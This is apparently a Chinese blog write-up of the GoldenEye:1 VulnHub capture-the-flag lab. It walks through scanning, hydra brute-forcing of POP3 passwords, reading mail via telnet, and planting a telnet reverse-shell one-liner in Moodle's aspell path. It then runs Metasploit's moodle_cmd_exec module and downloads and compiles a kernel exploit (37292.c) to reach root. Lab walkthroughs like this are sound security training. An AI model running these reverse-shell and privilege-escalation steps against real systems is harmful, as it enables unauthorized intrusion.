Please enable Javascript to view the contents

GoldenEye 1 VulnHub CTF 渗透测试记录

 ·  ☕ 9 分钟  ·  ✍️ IceKam · 👀... 阅读

简介

我最近完成了创建一个OSCP类型的易受攻击的机器,该机器以伟大的詹姆斯邦德电影(甚至更好的n64游戏)GoldenEye为主题。目标是获得root并捕获秘密的GoldenEye代码 - flag.txt。

我将它评为中级,它有很多种技术可以获得root权限 - 没有利用开发/缓冲区溢出。在完成OSCP之后,我认为这将是一个很好的练习,加上有一丝CTF风味。

我已经在VMware和VirtualBox上创建并验证了它。除了默认的Kali之外,您不需要任何额外的工具。将需要设置为仅限主机,并且在VMware上,您可能需要在出现提示时单击“重试”,因为格式化时最初启动它。

名称:GoldenEye:1
日期:2018年5月4日
作者: creosote
系列: GoldenEye

信息搜集

使用nmap收集网络信息。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org ) at CST
Nmap scan report for Sec.lan (192.168.123.1)
Nmap scan report for ubuntu.lan (192.168.123.126)
Host is up (0.00028s latency).
Not shown: 998 closed ports
PORT   STATE         SERVICE
25/tcp open|filtered smtp
80/tcp open|filtered http
MAC Address: 08:00:27:46:E1:60 (Oracle VirtualBox virtual NIC)


root @ Sec in /tmp
$ dirb http://192.168.123.126/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://192.168.123.126/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.123.126/ ----
+ http://192.168.123.126/index.html (CODE:200|SIZE:252)
+ http://192.168.123.126/server-status (CODE:403|SIZE:295)

-----------------```

80和25端口开放,目录很一般,再细化下。

```bash
$ nmap -A -p- -sS 192.168.123.126
Starting Nmap 7.70 ( https://nmap.org )
Nmap scan report for ubuntu.lan (192.168.123.126)
Host is up (0.00031s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/unknown
55007/tcp open  unknown
MAC Address: 08:00:27:46:E1:60 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.31 ms ubuntu.lan (192.168.123.126)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.70 second

网站分析

打开网站,有如下提示:

1
2
3
4
5
6
7
8
Severnaya Auxiliary Control Station
****TOP SECRET ACCESS****
Accessing Server Identity
Server Name:....................
GOLDENEYE

User: UNKNOWN
Naviagate to /sev-home/ to login
  • 很明显有/sev-home/是一二个登录页面。

查看源码,发现terminal.js里面有一段混淆的信息:

InvincibleHack3r

  • 解密后:InvincibleHack3r(可以使用Kali Linux下的解密工具,也可以在线解密)。

//Boris, make sure you update your default password.

  • 搜集到两个用户:borisnatalya

然后使用上面的信息在/sev-home/尝试登录。

登录成功。

网站分析2

登录后有如下信息:

GOLDENEYE
GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)
GoeleYe是苏联秘密武器项目的最高机密。既然你有机会,你绝对拥有最高机密,并有资格成为认证的GoaleYee网络运营商(GNO)。(装)
Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system
请电邮一位合格的GNO主管接受金眼操作员培训成为金眼系统管理员(提示利用邮箱相关)
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port
记住,由于隐蔽的安全性非常有效,因此我们已经将pop3服务配置为在非常高的非默认端口上运行(提示非默认的端口)

邮件帐号破解

好吧,非默认端口,我们上面扫描出了55007的端口,尝试下暴力破解吧。

pop3 A

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
$ hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.123.126 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra)
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.123.126:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.123.126   login: boris   password: secret1!
[STATUS] attack finished for 192.168.123.126 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
  • 使用hydra破解,用户名尝试boris,使用字典fasttrack。
  • 破解到的帐号密码为:login:boris password: secret1!

pop3 B

破解第二个用户:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
$ hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.123.126 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra)
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.123.126:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.123.126   login: natalya   password: bird
[STATUS] attack finished for 192.168.123.126 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
  • 使用hydra破解,用户名尝试natalya,使用字典fasttrack。
  • 破解到的帐号密码为:login: natalya password: bird

mail分析

使用破解帐号登录查看收件箱信息。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
$ telnet 192.168.123.126 55007
Trying 192.168.123.126...
Connected to 192.168.123.126.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS secret1!
+OK Logged in.
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id D9E47454B1
    for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

RETR 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id C3F2B454B1
    for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id 4B9F4454B1
    for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

并木有太多有用的信息,尝试第二个帐号。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root @ Sec in /tmp
$ telnet 192.168.123.126 55007
Trying 192.168.123.126...
Connected to 192.168.123.126.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER natalya
+OK
PASS bird
+OK Logged in.
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
    by ubuntu (Postfix) with ESMTP id D5EDA454B1
    for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 17C96454B1
    for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

获得一个帐号密码:username: xenia,password: RCP90rulez!
还有域名和目录信息:severnaya-station.com/gnocertdir

网站3

有了上面的信息,我们可以修改hosts文件指向这个域名然后访问。
echo " 192.168.123.126 severnaya-station.com" >> /etc/hosts

访问成功,发现有一个登录的url:
http://severnaya-station.com/gnocertdir/login/index.php
使用上面的帐号密码登录。
登录成功,登录后我发现有一处可以上传php,可是无法利用,遂换个思路。

在邮件中发现一个消息:My email username is..doak

尝试爆破doak的帐号。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
$ hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.123.126 -s 55007 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.123.126:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.123.126   login: doak   password: goat

破解成功,login: doak password: goat,然后使用telnet登录。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ telnet 192.168.123.126 55007
Trying 192.168.123.126...
Connected to 192.168.123.126.
Escape character is '^]'.
+OK GoldenEye POP3 Electronic-Mail System
USER doak
+OK
PASS goat
+OK Logged in.
LIST
+OK 1 messages:
1 606
.
RETR 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
    by ubuntu (Postfix) with SMTP id 97DC24549D
    for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

获取到一个帐号密码:username: dr_doak,password: 4England!,在webmail登录。

登录后在个人文件里面发现一个s3cret.txt文件,我们下载并打开:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
$ cat s3cret.txt
007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

这里有一个图片的提示,我们下载下来看看。

1
2
3
4
root@Sec:/tmp# strings for-007.jpg
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==

这有base64,解码。

1
2
root@Sec:/tmp# echo eFdpbnRlcjE5OTV4IQ== | base64 -d
xWinter1995x!r

解码到一个密码xWinter1995x!r

使用admin用户和这个密码成功登录到web。

反弹shell

http://severnaya-station.com/gnocertdir/admin/settings.php?section=systempaths页面发现一个可以直接执行反弹shell的地方。

Path to aspell:To use spell-checking within the editor, you MUST have aspell 0.50 or later installed on your server, and you must specify the correct path to access the aspell binary. On Unix/Linux systems, this path is usually /usr/bin/aspell, but it might be something else.
要在编辑器中使用拼写检查,必须在服务器上安装aspell 0.50或更高版本,并且必须指定访问aspell二进制文件的正确路径。在Unix / Linux系统上,这条路径通常是 /usr/bin/aspell,但它可能是其他东西。
里面的内容为:sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'

提示要求,经过搜索我们执行以下命令:

1
sh -c '(sleep 10|telnet 192.168.123.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.123.1 4444 >/dev/null 2>&1 &)'

然后保存,在插件页面/gnocertdir/admin/settings.php?section=editorsettingstinymce将编辑器的格式改为PSpellShell。

开启反弹

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf > use exploit/multi/http/moodle_cmd_exec
msf exploit(multi/http/moodle_cmd_exec) > set rhost severnaya-station.com
rhost => severnaya-station.com
msf exploit(multi/http/moodle_cmd_exec) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf exploit(multi/http/moodle_cmd_exec) > set username admin
username => admin
msf exploit(multi/http/moodle_cmd_exec) > set password xWinter1995x!
password => xWinter1995x!
msf exploit(multi/http/moodle_cmd_exec) > exploit

[*] Started reverse TCP double handler on 192.168.123.1:4444
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GaQ5qcFq6kLgIKHr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "GaQ5qcFq6kLgIKHr\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.126:48764)

提权

获取到shell,切换ssh模式,并收集内核信息。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
python -c 'import pty; pty.spawn("/bin/sh");'
$ cd /tmp
cd /tmp
$ ls
ls
$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic
$ cat /etc/lsb/release
cat /etc/lsb/release
cat: /etc/lsb/release: No such file or directory
$ cat /etc/lsb-release
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"

搜索内核漏洞。

1
2
3
4
5
6
7
8
9
$ searchsploit Ubuntu 14.04 3.13
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12. | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12. | exploits/linux/local/37293.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result

生成exp

试了下gcc无法在目标编译,搜索了下可以使用glang。

1
2
$ cp /usr/share/exploitdb/exploits/linux/local/37292.c /tmp
$ sed -i 's\gcc\clang\g' 37292.c

替换gcc为clang,并开启web。

1
2
$ python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

编译exp

在目标下载并编译运行exp。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
wget http://192.168.123.1/37292.c
$ clang 37292.c -o sec
$ ./sec
./sec
spawning threads
mount
mount
child threads done
/etc/ld.so.preload created
creating shared library
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

获得flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
cd /root
ls -a
.  ..  .bash_history  .bashrc  .cache  .flag.txt  .profile  .rnd  .viminfo
cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

心得

这个环境很6,看起来很简单,确是环环相扣,里面还存在一些漏洞,可以多试试,姿势很多。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
茶艺品鉴砖家,低端码字人口。